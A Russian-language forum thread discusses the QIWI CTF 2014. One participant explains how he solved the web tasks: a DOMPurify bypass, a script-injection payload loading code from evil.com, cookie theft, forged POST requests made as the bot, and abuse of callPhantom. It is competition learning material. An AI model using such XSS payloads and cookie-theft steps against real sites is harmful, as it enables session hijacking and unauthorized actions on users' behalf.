Старый 14.11.2014, 23:52   #1
UXOR
 
Регистрация: 31.08.2013
Сообщений: 3
Репутация: 0
По умолчанию ctf qiwi 2014

Команду RDot поздравляю с победой!

Кто еще учавствовал? Сколько очков получилось набрать?
Сам решал только задания из web'a. Думаю что в каждом задании нужно было получать флаг через xss, но к сожалению не фига не вышло.
UXOR вне форума   Ответить с цитированием
Старый 16.11.2014, 14:35   #3
Matthew
 
Аватар для Matthew
 
Регистрация: 14.06.2011
Сообщений: 35
Репутация: 3
По умолчанию

Упустил
Matthew вне форума   Ответить с цитированием
Старый 16.11.2014, 22:23   #4
UXOR
 
Регистрация: 31.08.2013
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от FIXER Посмотреть сообщение
всем написал в ПМ или упустил?)))
ну да во всех заданиях было XSS кроме одного )))
Хм, я вам не писал, кому писал...тому писал. Расскажите про эксплуатацию
UXOR вне форума   Ответить с цитированием
Старый 17.11.2014, 11:24   #5
Matthew
 
Аватар для Matthew
 
Регистрация: 14.06.2011
Сообщений: 35
Репутация: 3
По умолчанию

Всё просто. Там для вида был DOMPurify, который на самом деле бесполезен ибо document.write раскрывает html entity. Но более того была инъекция до выполнения DOMPurify при интерпретации шаблона в js контексте. Тоесть тупой пример
Цитата:
</script><script src=http://evil.com/></script>
подгрузит скрипт. Далее три флага достаются следующим образом:
1. Получаем document.cookie
2. От имени бота отправляем post запрос на /api/shop-items чтобы купить на имя своей учётки флаг (на самом деле это ошибка задания насколько я знаю, нужно было как то иначе, но так тоже норм).
3. замечаем использование callPhantom. Это функция которая дёргает колбек на стороне сервера у бота. Смотрим её вывод, находим что если её запустить с другим параметром то получим флаг.
Matthew вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot